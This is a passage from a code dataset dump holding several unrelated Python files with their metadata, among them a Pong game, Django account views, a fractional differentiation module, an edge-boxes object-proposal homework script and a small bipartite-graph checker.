Pong(threading.Thread):\n def __init__(self, q):\n shared.systemMessage(\"Starting pong\")\n threading.Thread.__init__(self)\n self.q = q\n self.eventConfig = {}\n self.running = True\n\n def run(self):\n try:\n pygame.init()\n FPS = 30\n fpsClock = pygame.time.Clock()\n\n display = pygame.display.set_mode((600, 300), 0, 32)\n pygame.display.set_caption('Pong')\n\n BLACK = (0, 0, 0)\n WHITE = (255, 255, 255)\n\n ball = pygame.image.load('cat-face.png')\n ball = pygame.transform.scale(ball, (30, 30))\n\n ballx = 285\n bally = 135\n\n paddle1 = (10, 115, 15, 70)\n paddle2 = (575, 115, 15, 70)\n\n while self.running:\n opCode = \"\"\n try:\n q_item = self.q.get(False)\n s = q_item\n opCode = s[0:2]\n except Exception: pass\n\n if opCode == \"ex\":\n print(\"Stopping command_interpreter\")\n self.running = False\n self.q.task_done()\n\n display.fill(BLACK)\n\n display.blit(ball, (ballx, bally))\n\n pygame.draw.rect(display, WHITE, paddle1, 0)\n pygame.draw.rect(display, WHITE, paddle2, 0)\n\n for event in pygame.event.get():\n if event.type == QUIT:\n shared.exitProgram()\n\n pygame.display.update()\n fpsClock.tick(FPS)\n\n except Exception as e:\n shared.systemMessage(str(e), True)\n 
shared.exitProgram()\n\n","sub_path":"pong.py","file_name":"pong.py","file_ext":"py","file_size_in_byte":1803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"28681394","text":"#!/usr/bin/env python3\nimport click\nimport logging\nimport json\nimport geojson\nimport geopandas as gpd\n\nlogger = logging.getLogger('indexgeojson')\n\n# Probably should use Click like the other scripts? -agl\n@click.command()\n@click.option('--geojson', '-g', default=\"./rumira.geojson\", help=\"geojson file to create extent\")\n@click.option('--output', '-o', default=\"../data/rumira_extent.txt\", help=\"output extent file\")\ndef index(geojson, output):\n print (output)\n\n #with open(geojson) as f:\n #gj = geojson.load(f)\n #features = gj['features'][0]\n #print(features)\n rumira = gpd.read_file(geojson)\n print(rumira.head())\n print(rumira.geometry[0])\n geom = rumira.geometry[0]\n #(minX, maxX, minY, maxY) = geom.GetEnvelope()\n #print(minX, maxX, minY, maxY)\n print(dir(geom))\n print(geom.envelope)\n print(geom.bounds)\n print(geom.exterior)\n extent = [geom.bounds[0], geom.bounds[2], geom.bounds[1], geom.bounds[3]]\n print(extent)\n\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(format='%(asctime)s %(levelname)s %(message)s', level=logging.INFO)\n logger.info(\"Starting the index process\")\n index()\n","sub_path":"labs/ciab/scripts/make_index_from_geojson.py","file_name":"make_index_from_geojson.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"329927358","text":"from django.shortcuts import render\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth import authenticate, login\nfrom django.urls import reverse\nfrom .forms import LoginForm, RegistrationForm, UserProfileForm, UserForm\nfrom .models import UserProfile\n\ndef register(request):\n if request.method == 'POST':\n user_form = RegistrationForm(request.POST)\n userprofile_form = UserProfileForm(request.POST)\n if user_form.is_valid() and userprofile_form.is_valid():\n new_user = user_form.save(commit=False)\n new_user.set_password(user_form.cleaned_data['password'])\n new_user.save()\n new_profile = userprofile_form.save(commit=False)\n new_profile.user = new_user\n new_profile.save()\n return HttpResponseRedirect(reverse('account:user_login'))\n else:\n return HttpResponse(\"Sorry, register error.\")\n else:\n user_form = RegistrationForm()\n userprofile_form = UserProfileForm()\n return render(request, 'account/register.html', {\"form\": user_form, 'profile': userprofile_form})\n\n\n@login_required(login_url='/account/login/')\ndef myself(request):\n # user = User.objects.get(username=request.user.username)\n # userprofile = UserProfile.objects.get(user=user)\n # return render(request, 'account/myself.html', {'user':user, 'userprofile': userprofile})\n user = User.objects.get(username=request.user.username)\n userprofile = UserProfile.objects.get(user=user)\n if request.method == 'GET':\n user_form = UserForm(instance=request.user)\n userprofile_form = UserProfileForm(initial={'birth':userprofile.birth, 'phone':userprofile.phone, 'aboutme':userprofile.aboutme})\n return render(request, 'account/myself.html', {'user_form':user_form,\n 'userprofile_form':userprofile_form, 'userprofile': userprofile})\n if request.method == 'POST':\n new_user_form 
= UserForm(request.POST)\n new_user_profile_form = UserProfileForm(request.POST)\n if new_user_form.is_valid() and new_user_profile_form.is_valid():\n user_cd = new_user_form.cleaned_data\n user_profile_cd = new_user_profile_form.cleaned_data\n user.email = user_cd['email']\n userprofile.birth = user_profile_cd['birth']\n userprofile.phone = user_profile_cd['phone']\n userprofile.aboutme = user_profile_cd['aboutme']\n user.save()\n userprofile.save()\n return HttpResponseRedirect('/account/myself')\n else:\n return HttpResponse('Data error 1.')\n else:\n return HttpResponse('Unkown error.')\n\n@login_required(login_url='/account/login/')\ndef my_image(request):\n # return render(request, 'account/imagecrop.html',)\n if request.method == 'POST':\n img = request.POST['img']\n userprofile = UserProfile.objects.get(user=request.user.id)\n userprofile.photo = img\n userprofile.save()\n return HttpResponse('1')\n else:\n return render(request, 'account/imagecrop.html',)","sub_path":"account/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"39592247","text":"\"\"\"\nFractional differentiation is a technique to make a time series stationary but also\nretain as much memory as possible. This is done by differencing by a positive real\nnumber. Fractionally differenced series can be used as a feature in machine learning\nprocess.\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\n\n\nclass FractionalDifferentiation:\n \"\"\"\n FractionalDifferentiation class encapsulates the functions that can\n be used to compute fractionally differentiated series.\n \"\"\"\n\n @staticmethod\n def get_weights(diff_amt, size):\n \"\"\"\n Source: Chapter 5, AFML (section 5.4.2, page 79)\n The helper function generates weights that are used to compute fractionally\n differentiated series. It computes the weights that get used in the computation\n of fractionally differentiated series. This generates a non-terminating series\n that approaches zero asymptotically. The side effect of this function is that\n it leads to negative drift \"caused by an expanding window's added weights\"\n (see page 83 AFML)\n\n When diff_amt is real (non-integer) positive number then it preserves memory.\n\n The book does not discuss what should be expected if d is a negative real\n number. Conceptually (from set theory) negative d leads to set of negative\n number of elements. And that translates into a set whose elements can be\n selected more than once or as many times as one chooses (multisets with\n unbounded multiplicity) - see http://faculty.uml.edu/jpropp/msri-up12.pdf.\n\n :param diff_amt: (float) differencing amount\n :param size: (int) length of the series\n :return: (ndarray) weight vector\n \"\"\"\n\n # The algorithm below executes the iterative estimation (section 5.4.2, page 78)\n weights = [1.] 
# create an empty list and initialize the first element with 1.\n for k in range(1, size):\n weights_ = -weights[-1] * (diff_amt - k + 1) / k # compute the next weight\n weights.append(weights_)\n\n # Now, reverse the list, convert into a numpy column vector\n weights = np.array(weights[::-1]).reshape(-1, 1)\n return weights\n\n @staticmethod\n def frac_diff(series, diff_amt, thresh=0.01):\n \"\"\"\n Source: Chapter 5, AFML (section 5.5, page 82);\n\n References:\n https://www.wiley.com/en-us/Advances+in+Financial+Machine+Learning-p-9781119482086\n https://wwwf.imperial.ac.uk/~ejm/M3S8/Problems/hosking81.pdf\n https://en.wikipedia.org/wiki/Fractional_calculus\n\n The steps are as follows:\n - Compute weights (this is a one-time exercise)\n - Iteratively apply the weights to the price series and generate output points\n\n This is the expanding window variant of the fracDiff algorithm\n Note 1: For thresh-1, nothing is skipped\n Note 2: diff_amt can be any positive fractional, not necessarility bounded [0, 1]\n\n :param series: (pd.Series) a time series that needs to be differenced\n :param diff_amt: (float) Differencing amount\n :param thresh: (float) threshold or epsilon\n :return: (pd.DataFrame) data frame of differenced series\n \"\"\"\n\n # 1. Compute weights for the longest series\n weights = get_weights(diff_amt, series.shape[0])\n\n # 2. Determine initial calculations to be skipped based on weight-loss threshold\n weights_ = np.cumsum(abs(weights))\n weights_ /= weights_[-1]\n skip = weights_[weights_ > thresh].shape[0]\n\n # 3. Apply weights to values\n output_df = {}\n for name in series.columns:\n series_f = series[[name]].fillna(method='ffill').dropna()\n output_df_ = pd.Series(index=series.index)\n\n for iloc in range(skip, series_f.shape[0]):\n loc = series_f.index[iloc]\n\n # At this point all entries are non-NAs so no need for the following check\n # if np.isfinite(series.loc[loc, name]):\n output_df_[loc] = np.dot(weights[-(iloc + 1):, :].T, series_f.loc[:loc])[0, 0]\n\n output_df[name] = output_df_.copy(deep=True)\n output_df = pd.concat(output_df, axis=1)\n return output_df\n\n @staticmethod\n def get_weights_ffd(diff_amt, thresh, lim):\n \"\"\"\n Source: Chapter 5, AFML (section 5.4.2, page 83)\n\n The helper function generates weights that are used to compute fractionally\n differentiate dseries. It computes the weights that get used in the computation\n of fractionally differentiated series. The series is of fixed width and same\n weights (generated by this function) can be used when creating fractional\n differentiated series.\n This makes the process more efficient. But the side-effect is that the\n fractionally differentiated series is skewed and has excess kurtosis. 
In\n other words, it is not Gaussian any more.\n\n The discussion of positive and negative d is similar to that in get_weights\n (see the function get_weights)\n\n :param diff_amt: (float) differencing amount\n :param thresh: (float) threshold for minimum weight\n :param lim: (int) maximum length of the weight vector\n :return: (ndarray) weight vector\n \"\"\"\n\n weights = [1.]\n k = 1\n\n # The algorithm below executes the iterativetive estimation (section 5.4.2, page 78)\n # The output weights array is of the indicated length (specified by lim)\n ctr = 0\n while True:\n # compute the next weight\n weights_ = -weights[-1] * (diff_amt - k + 1) / k\n\n if abs(weights_) < thresh:\n break\n\n weights.append(weights_)\n k += 1\n ctr += 1\n if ctr == lim - 1: # if we have reached the size limit, exit the loop\n break\n\n # Now, reverse the list, convert into a numpy column vector\n weights = np.array(weights[::-1]).reshape(-1, 1)\n return weights\n\n @staticmethod\n def frac_diff_ffd(series, diff_amt, thresh=1e-5):\n \"\"\"\n Source: Chapter 5, AFML (section 5.5, page 83);\n\n References:\n https://www.wiley.com/en-us/Advances+in+Financial+Machine+Learning-p-9781119482086\n https://wwwf.imperial.ac.uk/~ejm/M3S8/Problems/hosking81.pdf\n https://en.wikipedia.org/wiki/Fractional_calculus\n\n The steps are as follows:\n - Compute weights (this is a one-time exercise)\n - Iteratively apply the weights to the price series and generate output points\n\n Constant width window (new solution)\n Note 1: thresh determines the cut-off weight for the window\n Note 2: diff_amt can be any positive fractional, not necessarity bounded [0, 1].\n\n :param series: (pd.Series)\n :param diff_amt: (float) differencing amount\n :param thresh: (float) threshold for minimum weight\n :return: (pd.DataFrame) a data frame of differenced series\n \"\"\"\n\n # 1) Compute weights for the longest series\n weights = get_weights_ffd(diff_amt, thresh, series.shape[0])\n width = len(weights) - 1\n\n # 2) Apply weights to values\n # 2.1) Start by creating a dictionary to hold all the fractionally differenced series\n output_df = {}\n\n # 2.2) compute fractionally differenced series for each stock\n for name in series.columns:\n series_f = series[[name]].fillna(method='ffill').dropna()\n temp_df_ = pd.Series(index=series.index)\n for iloc1 in range(width, series_f.shape[0]):\n loc0 = series_f.index[iloc1 - width]\n loc1 = series.index[iloc1]\n\n # At this point all entries are non-NAs, hence no need for the following check\n # if np.isfinite(series.loc[loc1, name]):\n temp_df_[loc1] = np.dot(weights.T, series_f.loc[loc0:loc1])[0, 0]\n\n output_df[name] = temp_df_.copy(deep=True)\n\n # transform the dictionary into a data frame\n output_df = pd.concat(output_df, axis=1)\n return output_df\n\n\ndef get_weights(diff_amt, size):\n \"\"\" This is a pass-through function \"\"\"\n return FractionalDifferentiation.get_weights(diff_amt, size)\n\n\ndef frac_diff(series, diff_amt, thresh=0.01):\n \"\"\" This is a pass-through function \"\"\"\n return FractionalDifferentiation.frac_diff(series, diff_amt, thresh)\n\n\ndef get_weights_ffd(diff_amt, thresh, lim):\n \"\"\" This is a pass-through function \"\"\"\n return FractionalDifferentiation.get_weights_ffd(diff_amt, thresh, lim)\n\n\ndef frac_diff_ffd(series, diff_amt, thresh=1e-5):\n \"\"\" This is a pass-through function \"\"\"\n return FractionalDifferentiation.frac_diff_ffd(series, diff_amt, 
thresh)\n","sub_path":"mlfinlab/features/fracdiff.py","file_name":"fracdiff.py","file_ext":"py","file_size_in_byte":8825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"211825942","text":"\"\"\"Extraction of content which appears in title case in tokenized text.\n\n\"\"\"\n\nimport re\n\n\n_NO_CAPS = {\n u'a',\n u'an',\n u'and',\n u'at',\n u'but',\n u'by',\n u'for',\n u'from',\n u'nor',\n u'of',\n u'on',\n u'or',\n u'so',\n u'the',\n u'to',\n u'up',\n u'yet',\n}\n\n\n_OPEN = u'('\n\n_CLOSE = u')'\n\n\ndef find_titles(tokenized):\n \"\"\"Just find things that look like titles in the text\"\"\"\n\n # 1) Parse text as normal, looking for title-case words.\n # 2) If a parenthesis is found and not already accepted a partial\n # title, keep parsing.\n # 3) If a paren is found and already parsed a partial title, see if\n # the whole thing looks to be title case. If yes, include it, if no\n # it is terminal.\n # 4) If a close paren is found and we have a title already and the\n # whole paren was not a title, the close paren is terminal.\n\n titles = []\n title = []\n\n i = 0\n\n while i < len(tokenized):\n token = tokenized[i]\n chars, start, end = token\n parsed = None\n\n if chars == _OPEN and len(title) > 0:\n accept_paren, ptitle = _parse_parenthesized(tokenized, i)\n if accept_paren:\n title += ptitle\n i += len(ptitle)\n else:\n parsed, title = _terminate(title)\n i += 1\n\n elif chars == _CLOSE:\n parsed, title = _terminate(title)\n i += 1\n\n else:\n if _should_accept_token(chars, title):\n title.append(token)\n else:\n parsed, title = _terminate(title)\n i += 1\n\n if parsed is not None:\n titles.append(parsed)\n\n # Trailing tokens on last iteration\n parsed, title = _terminate(title)\n if parsed is not None:\n titles.append(parsed)\n\n return titles\n\n\ndef _should_accept_token(token, title):\n return (\n token[0].isupper() or\n re.match(r'\\d+', token) or\n len(title) > 0 and token in _NO_CAPS\n )\n\n\ndef _terminate(title):\n title = _remove_trailing_conjunctions(title)\n parsed = title if len(title) > 0 else None\n return parsed, []\n\n\ndef _remove_trailing_conjunctions(title):\n \"\"\"Avoid accepting eg. 'The Human Rights Act 2000 and'. 
\"\"\"\n i = start = len(title)\n while i > 0 and title[i-1][0] in _NO_CAPS:\n i -= 1\n\n if i < start:\n return title[:i]\n else:\n return title\n\n\ndef _parse_parenthesized(tokenized, start):\n \"\"\"Examine a parenthesized phrase for inclusion in a title.\n\n Returns (accept, phrase) indicating whether the parsed expression should\n be included in the title.\n\n \"\"\"\n # - Parentheses must be balanced.\n # - All content in parentheses must written in title-case to be included.\n\n brackets_stack = []\n parenthesized = []\n i = start\n all_accepted = True\n\n if not tokenized[start][0] == u'(':\n raise Exception(\n u'No parens starting at {}'.format(start))\n\n while i < len(tokenized):\n token = tokenized[i]\n chars, start, end = token\n\n all_accepted = (\n all_accepted and\n (_should_accept_token(chars, parenthesized) or chars in [_OPEN, _CLOSE])\n )\n\n if chars == u'(':\n parenthesized.append(token)\n brackets_stack.append(chars)\n\n elif chars == u')':\n parenthesized.append(token)\n try:\n brackets_stack.pop()\n except IndexError:\n # Unbalanced\n return False, parenthesized\n else:\n if len(brackets_stack) == 0:\n # End of parens\n return all_accepted, parenthesized\n\n else:\n parenthesized.append(token)\n\n i += 1\n\n balanced = len(brackets_stack) == 0\n final_accepted = all_accepted and balanced\n return final_accepted, parenthesized\n","sub_path":"src/server/lawcrunch/textanalysis/titles.py","file_name":"titles.py","file_ext":"py","file_size_in_byte":3928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"178149291","text":"import mrjob\nimport mrjob.compat\nfrom mrjob.job import MRJob\nfrom mrjob.step import MRStep\n\n# import re\nfrom mrjob.protocol import JSONValueProtocol\n\nclass businessReviewJoin(MRJob):\n\n\n INPUT_PROTOCOL = JSONValueProtocol\n SORT_VALUES=True\n \n def mapper(self, _, data):\n if data['type'] == 'review':\n self.increment_counter('status','review.json found',1)\n try:\n yield data['business_id'], ('review', data['text'])\n except ValueError as e:\n pass\n elif data['type'] == 'business':\n self.increment_counter('status','business.json found',1)\n\n try:\n yield data['business_id'], ('categories', data['categories'])\n except ValueError :\n return\n\n\n def reducer(self, key, values):\n cate = None\n for v in values:\n if v[0]=='categories':\n cate = v[1]\n continue\n if not cate:\n self.increment_counter('Warning','No Cate Found',1)\n continue\n self.increment_counter('Status','Cate Found',1)\n yield cate, v[1]\n \n \n def tally_mapper (self, key, values):\n for item in key:\n yield item, len(values)\n def tally_combiner(self, key, values):\n count = 0\n total = 0\n for value in values:\n count += 1\n total += value\n yield key, float(total/count) \n\n def tally_reducer(self, key, values):\n count = 0\n total = 0\n for value in values:\n count += 1\n total += value\n yield key, float(total/count) \n \n \n def steps(self):\n return[\n MRStep(mapper = self.mapper,\n reducer = self.reducer),\n \n MRStep(mapper = self.tally_mapper,\n combiner = self.tally_combiner,\n reducer = self.tally_reducer)]\n \nif __name__ == '__main__':\n businessReviewJoin.run()\n\n\n\n\n","sub_path":"stats/review&tips/joinReviewCtg.py","file_name":"joinReviewCtg.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"310937237","text":"#!/usr/bin/env 
python\n\n#################################################################################################\n# Import libraries\n# These are libraries that you will want to use for this homework\n# cv2 is a libary that is useful for image manipulation\n# os is a libary that does system type things (like creating directories)\n# xml... is a library that lets you parse XML files easily (the annotations are stored in xml files)\n# the last three are necessary to import the edge_boxes library that we'll be using\n#################################################################################################\nimport cv2\t\nimport os\nfrom os import walk\nimport xml.etree.ElementTree as ET\nimport sys\nsys.path.append('/home/min/a/ee570/edge-boxes-with-python/')\t\nimport edge_boxes\nimport time\n\n#################################################################################################\n# User-defined variables\n#################################################################################################\n# This is where the dataset that we'll be working with lives. \n# Since you will be parsing the directory structure, it'd probably be useful to go there and\n# see what it looks like. Type \"nautilus /home/min/a/ee570/hw3-files/hw3-dataset &\" to open a\n# file browser in that directory so you can poke around.\ndatasetDir = '/home/min/a/ee570/hw3-files/hw3-dataset'\n\n# The classes, their ID's, and labels are as follows:\n# \tCLASS NAME\t\tCLASS ID\t\tLABEL\n#\tfox\t\t\t\tn02119789\t\t0\n#\tbike\t\t\tn03792782\t\t1\n#\telephant\t\tn02504458\t\t2\n#\tcar\t\t\t\tn04037443\t\t3\n\n#################################################################################################\n# Function to compute IoU\n# Code lifted from here (THANKS!): \n#\thttp://www.pyimagesearch.com/2016/11/07/intersection-over-union-iou-for-object-detection/\n# Added check at beginning to determine if the boxes actually overlap\n# function takes in two variables, both of which are 1x4 arrays that look like this:\n# box[0] = topLeftX coordinate\n# box[1] = topLeftY coordinate\n# box[2] = bottomRightX coordinate\n# box[3] = bottomRightY coordinate\n#################################################################################################\ndef bb_intersection_over_union(boxA, boxB):\n\t# determine if the boxes don't overlap at all\n\tif (boxB[0] > boxA[2]) or (boxA[0] > boxB[2]) or (boxB[1] > boxA[3]) or (boxA[1] > boxB[3]):\n\t\treturn 0\n\n\t# determine the (x, y)-coordinates of the intersection rectangle\n\txA = max(boxA[0], boxB[0])\n\tyA = max(boxA[1], boxB[1])\n\txB = min(boxA[2], boxB[2])\n\tyB = min(boxA[3], boxB[3])\n \n\t# compute the area of intersection rectangle\n\tinterArea = (xB - xA + 1) * (yB - yA + 1)\n \n\t# compute the area of both the prediction and ground-truth rectangles\n\tboxAArea = (boxA[2] - boxA[0] + 1) * (boxA[3] - boxA[1] + 1)\n\tboxBArea = (boxB[2] - boxB[0] + 1) * (boxB[3] - boxB[1] + 1)\n \n\t# compute the intersection over union by taking the intersection\n\t# area and dividing it by the sum of prediction + ground-truth\n\t# areas - the interesection area\n\tiou = interArea / float(boxAArea + boxBArea - interArea)\n \n\t# return the intersection over union value\n\treturn iou\n\n\n#################################################################################################\n# This is how you would get a list of all files in a 
directory\n#################################################################################################\n\nlistcind=[\"/n02119789\",\"/n03792782\",\"/n02504458\",\"/n04037443\"]\nlistnames=[\"fox\",\"bike\",\"elephant\",\"car\"]\n\nfor clind in range(0,4):\n\timageDir = datasetDir + listcind[clind];\n\timageFiles = []\n\n\tfor (dirpath, dirnames, filenames) in walk(imageDir):\n\t\timageFiles.extend(filenames)\n\t\tbreak\n\n\t#print \"Printing list of image files\"\n\t#print imageFiles\n\t#print \"num Image Files in n02119789: \", len(imageFiles)\n\n\n\t#################################################################################################\n\t# This is how you would get the edge boxes for an image\n\t#\n\t# imageFileNames is a python list with absolute paths to images (the list can be of length 1)\n\t#\n\t# windows is a python list that looks like this:\n\t# \t\twindows[imageIdx][boxIdx][0] = topLeftY\n\t# \t\twindows[imageIdx][boxIdx][1] = topLeftX\n\t# \t\twindows[imageIdx][boxIdx][2] = bottomRightY\n\t# \t\twindows[imageIdx][boxIdx][3] = bottomRightX\n\t# \t\twindows[imageIdx][boxIdx][4] = quality of proposal (higher number = more likely to be an object)\n\t#\n\t# NOTE: imageIdx has N elements, where N is the number of images you passed into the function\n\t#\t\tN = 2 in the example below\t\n\t# NOTE: the size of boxIdx varies for each image. In other words, on image1, there might be 2318 \n\t#\t\tboxes...and on image2, there might be 809 boxes.\n\t# NOTE: When you are developing your code, I would recommend passing in a single image to the \n\t#\t\tfunction below. It took ~15 seconds on ecegrid to compute proposals on a single image and\n\t#\t\treturn the results.\n\t#\t\tAfter your code is working properly, and you are ready to run the algorithm on all the images\n\t#\t\tin the directory (ideally you have a nice loop setup to do this), I would recommend you tweak\n\t#\t\tyour code so you only call edge_boxes once (and pass in a list with paths to all the images).\n\t#\t\tWhy? Of the 15 seconds, something like 14.5 of them are \"waiting for Matlab to load\". Only\n\t#\t\t0.5 of them are doing work. If you have to loop over 400 images, waiting 14.5 seconds per image\n\t#\t\t(for Matlab to load) adds up to something like 100 minutes. If you call the edge_boxes function\n\t#\t\tonce (with paths to all 400 images), it only takes 3 minutes to run on ecegrid.\n\t# \t\tSO... again my advice: develop your code by passing in a single image (since waiting 15 seconds\n\t#\t\tis better than waiting 3 minutes). Then, when you're ready to run your code on the entire \n\t#\t\tdirectory of images, tweak your code to call edge_boxes once.\n\t# NOTE:\tWhen I had finished coding and was ready to run my code on the entire directory of images,\n\t#\t\tit took ~15 minutes from beginning to end. Each directory of images (4 total) took ~3 minutes\n\t#\t\tfor edge_boxes to run and ~1.5 minutes for the discovery, sorting, and saving of pos/neg images. \n\t#\t\tWhat can you do while you wait 15 minutes for your code to complete? 
Start working on phase2!\n\t#################################################################################################\n\timageFileNames = []\n\tfor fi in range(0,len(imageFiles)):\n\t\timageFileNames.append(imageDir + \"/\" + imageFiles[fi])\n\t\t\n\twindows = edge_boxes.get_windows(imageFileNames)\n\tpt=0;nt=0;\n\tt0=time.time()\n\tfor fi in range(0,len(imageFiles)):\n\t\tannotationFileName = datasetDir + \"/annotation\"+listcind[clind]+\"/\"+imageFiles[fi][:-5]+\".xml\"\n\n\t\t# load the annotation file into a data structure\n\t\ttree = ET.parse(annotationFileName)\n\t\tobjs = tree.findall('object') # \"object\" is the tag for an instance of the class. There can be multiple\n\t\t\t\t\t\t\t\t # \"object\" tags if there are multiple instances of the class in the image.\n\t\t#numObjs = len(objs) # this is how many ground truth instances there are \n\n\t\t# This is one way of looping over the instances and extracting their coordinates\n\t\tgroundTruthBox=[]\n\t\tfor ix, obj in enumerate(objs):\n\t\t\tbbox = obj.find('bndbox') # bndbox is a tag inside of \"object\". It has the ground truth coordinates\n\t\t\tgroundTruth_x1 = int(bbox.find('xmin').text)\n\t\t\tgroundTruth_y1 = int(bbox.find('ymin').text)\n\t\t\tgroundTruth_x2 = int(bbox.find('xmax').text)\n\t\t\tgroundTruth_y2 = int(bbox.find('ymax').text)\n\n\t\t\t# here I put the four coordinates into a \"box\" that I might pass into my bb_intersection_over_union function. (#useful!)\n\t\t\tgroundTruthBox.append([groundTruth_x1, groundTruth_y1, groundTruth_x2, groundTruth_y2])\n\t\t \n\t\tpcnt=0;ncnt=0;\n\t\tprpfig=windows[fi]\n\t\tfor bi in range(0,len(windows[fi])):\n\t\t\n\t\t\tprop=[prpfig[bi][1], prpfig[bi][0], prpfig[bi][3], prpfig[bi][2]]\n\t\t\t#################################################################################################\n\t\t\t# This is how you get the annotations for an image\n\t\t\t# It would behoove you to go look at one of the XML files so you know what they look like.\n\t\t\t# The code below will make more sense if you do.\n\t\t\t#################################################################################################\n\t\t\tmaxiou=0;\n\t\t\tfor itera in range(0,len(groundTruthBox)):\n\t\t\t\tiou = bb_intersection_over_union(groundTruthBox[itera], prop)\n\t\t\t\tif(iou>maxiou):\n\t\t\t\t\tmaxiou=iou\n\t\t\tif (maxiou>0.7 and pcnt<5):\n\t\t\t\t#True proposal\n\t\t\t\tpcnt=pcnt+1\n\t\t\t\tpt=pt+1\n\t\t\t\timg=cv2.imread(imageFileNames[fi])\n\t\t\t\tcrop_img=img[int(prop[1]):int(prop[3]), int(prop[0]):int(prop[2])]\n\t\t\t\t#crop_img=img[int(windows[fi][bi][0]):int(windows[fi][bi][2]), int(windows[fi][bi][1]):int(windows[fi][bi][3])]\n\t\t\t\tstring=\"images/\"+listnames[clind]+\"/pos/image_\"+str(pt+10000)[1:]+\".jpeg\"\n\t\t\t\tcv2.imwrite(string, crop_img)\n\t\t\telif (maxiou<0.4 and ncnt<5):\n\t\t\t\t#False proposal\n\t\t\t\tncnt=ncnt+1\n\t\t\t\tnt=nt+1\n\t\t\t\timg=cv2.imread(imageFileNames[fi])\n\t\t\t\tcrop_img=img[int(prop[1]):int(prop[3]), int(prop[0]):int(prop[2])]\n\t\t\t\t#crop_img=img[int(windows[fi][bi][0]):int(windows[fi][bi][2]), int(windows[fi][bi][1]):int(windows[fi][bi][3])]\n\t\t\t\tstring=\"images/\"+listnames[clind]+\"/neg/image_\"+str(nt+10000)[1:]+\".jpeg\"\n\t\t\t\tcv2.imwrite(string, crop_img)\n\t\t\telif (pcnt==5 and ncnt==5):\n\t\t\t\tbreak\n\n\tt1=time.time()\n\n\tprint(t1-t0)\n\t\n\n\n#################################################################################################\n# This is how you would check if a directory exists...and if it doesn't, create 
it\n#################################################################################################\n#if not os.path.exists(\"images\"):\n#\tos.makedirs(\"images\")\n\n\n#################################################################################################\n# Here we put a lot of the pieces together to load an image and display a bounding box around\n# the instance of the class.\n#################################################################################################\n\n# load the image\n\n#image = cv2.imread(datasetDir + \"/n02119789/n02119789_14086.JPEG\")\n\n# load the annotations\n#tree = ET.parse(datasetDir + \"/annotation/n02119789/n02119789_14086.xml\")\n#objs = tree.findall('object')\n\n# This is one way of looping over the instances and extracting their coordinates\n#for ix, obj in enumerate(objs):\n#\tbbox = obj.find('bndbox') # bndbox is a tag inside of \"object\". It has the ground truth coordinates\n#\tx1 = int(bbox.find('xmin').text)\n#\ty1 = int(bbox.find('ymin').text)\n#\tx2 = int(bbox.find('xmax').text)\n#\ty2 = int(bbox.find('ymax').text)\n\t\n\t# draw bounding boxes on the image\n#\tcv2.rectangle(image, (x1, y1), (x2, y2), (0, 255, 0), 1)\n\n#cv2.imshow('Cute foxes', image)\n#print \"Wasn't this a cute demo?\"\n#print \"Press the space bar to close the image of the foxes.\"\n#cv2.waitKey(0)\n\n","sub_path":"hw3/hw3-phase1.py","file_name":"hw3-phase1.py","file_ext":"py","file_size_in_byte":10793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"436940575","text":"from __future__ import print_function\nfrom itertools import product\nimport sys\nsys.modules[\"hashlib\"] = sys.sha512 = sys\nfrom random import shuffle\ninput = raw_input\n\ndef solve():\n lol1 = [0, 1, 2, 3]\n lol2 = list('0123456789')\n n = int(input())\n ls = [input() for _ in range(n)]\n blah = 123123123123\n halb = None\n for _ in range(100):\n shuffle(lol1)\n shuffle(lol2)\n c = 0\n s = set()\n res = []\n for elt in ls:\n if elt not in s:\n s.add(elt)\n res.append(elt)\n continue\n c += 1\n worked = False\n lol = product(lol1, lol2)\n for i, char in lol:\n temp = ''.join([elt[j] if j != i else char for j in range(4)])\n if temp not in s:\n s.add(temp)\n res.append(temp)\n worked = True\n break\n assert worked\n if c < blah:\n blah = c\n halb = res\n print(c)\n for asdf in halb:\n print(asdf)\n\n\nt = int(input())\nfor _ in range(t):\n solve()\n","sub_path":"codeforces/1263/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"500333709","text":"import networkx as nx\nfrom networkx.algorithms import bipartite\n\ndef verifier(nodes, edges, choice):\n g = nx.Graph()\n g.add_nodes_from(nodes);\n g.add_edges_from(edges);\n is_bip = nx.is_bipartite(g)\n if choice in \"true\":\n choice = True\n else:\n choice = False\n if not(is_bip ^ choice):\n print('Risposta esatta')\n else:\n print('Risposta errata')","sub_path":"exercise_1/verifier/bip_v.py","file_name":"bip_v.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"71678826","text":"\"\"\"\nInput {'key1': 'value1', 'key2': [1, 2, 3], 'key3': (1, 2, 3)} Output True\nInput [{'key1': 'value1', 'key2': [1, 2, 3], 'key3': (1, 2, 3)} Output False\n\"\"\"\n\n\ndef validate_format(chars: str) -> bool:\n lookup = {'{': '}', '[': ']', '(': ')'}\n stack = []\n for char in chars:\n # if 
